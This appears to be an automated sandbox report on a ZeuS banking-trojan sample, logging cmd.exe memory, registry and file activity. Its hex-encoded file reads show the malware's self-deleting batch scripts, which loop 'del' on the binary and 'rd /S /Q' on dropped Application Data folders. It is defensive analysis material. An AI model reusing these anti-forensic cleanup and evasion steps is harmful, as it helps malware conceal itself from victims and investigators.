Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004580394
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004581601
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004582782
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004583987
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004585163
Memory attributes changed PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C50000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2004586400
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2004589344
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2004589545
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2004589732
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2004590457
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DisableUNCCheck object name not found 2004591571
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: EnableExtensions success or wait 2004591770
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DelayedExpansion object name not found 2004591957
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DefaultColor success or wait 2004592143
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: CompletionChar success or wait 2004592330
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: PathCompletionChar success or wait 2004592516
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: AutoRun success or wait 2004592703
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DisableUNCCheck object name not found 2004592921
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: EnableExtensions success or wait 2004593111
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DelayedExpansion object name not found 2004593299
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: DefaultColor success or wait 2004593486
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: CompletionChar success or wait 2004593673
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: PathCompletionChar object name not found 2004593859
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: AutoRun object name not found 2004594045
Memory allocated PID: 2536 Path: C:\WINDOWS\system32\cmd.exe Base: C60000 Length: 13FE10 Allocation Type: null Protection: page read and write success or wait 2004594983
Section loaded Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: query and read Type: commit Baseaddress: C70000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2004608614
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 2004611505
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 success or wait 2004617649
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 success or wait 2004622529
File opened Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2004628034
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 2004631361
File read Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Offset: none Length: 8192 Value: 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 65 64 65 64 39 31 31 65 2E 62 61 74 22 0D 0A 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 2004639100
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and delete Options: non directory file and open for backup ident and open reparse point success or wait 2004644606
File opened Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false object name not found 2004646213
Analysis File: cmd.exe PID: 604 Parent PID: 1636
+ Sections
+ General
Start time: 06:07:15
Start date: 01/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Foluv read attributes and delete and synchronize directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 1 4AD0D378
C:\Documents and Settings\Administrator\Application Data\Qiokze read attributes and delete and synchronize directory file and synchronous io non alert and open for backup ident and open reparse point object name not found 1 4AD0D378
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 3A 64 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 0D 0A 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 72 64 20 2F 53 20 2F 51 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 46 6F 6C 75 76 22 20 67 6F 74 6F 20 64 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 41 70 70 6C 69 63 61 74 69 6F 6E 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 34 64 39 34 65 34 64 37 2E 62 61 74 22 0D 0A 20 44 61 74 61 5C 51 69 6F 6B 7A 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 success or wait 1 4AD069F8
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
none query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 270000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 290000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2E0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 330000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 330000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 340000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 480000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 490000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 970000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 970000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 440000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 440000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 440000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 970000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp4d94e4d7.bat query and read commit 980000 4096 own pid readonly success or wait 1
Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DisableUNCCheck object name not found 2 4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager EnableExtensions success or wait 2 4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DelayedExpansion object name not found 2 4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager DefaultColor success or wait 2 4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager PathCompletionChar success or wait 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager AutoRun success or wait 1 4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager CompletionChar success or wait 1 4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager PathCompletionChar object name not found 1 4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager AutoRun object name not found 1 4AD04BB8
Memory Activities:
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
604 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2109430771
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2109434282
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2109437687
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2109438695
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2109439477
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2109440206
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2109441319
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2109441676
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2109452261
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2109455518
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2109456375
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2109462572
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2109464270
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2109469026
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2109479460
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2109481541
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2109483982
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2109487493
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2109490353
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2109494211
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2109500221
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2109501636
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2109506705
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2109514114
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2109520151
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2109521577
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2109526502
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2109529429
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2109535199
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2109543907
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2109548865
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2109550313
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2109558794
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2109573761
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2109575947
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2109578030
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2109696896
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2109737285
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2109739521
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2109749051
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109755538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2109764428
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2109803197
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2109819502
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck object name not found 2109842723
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions success or wait 2109843328
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion object name not found 2109844093
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor success or wait 2109844602
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar success or wait 2109845109
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar success or wait 2109845613
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun success or wait 2109846118
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DisableUNCCheck object name not found 2109846708
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: EnableExtensions success or wait 2109847223
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DelayedExpansion object name not found 2109847729
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: DefaultColor success or wait 2109848233
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: CompletionChar success or wait 2109848737
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: PathCompletionChar object name not found 2109849242
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Multimedia\Audio Compression Manager Name: AutoRun object name not found 2109849746
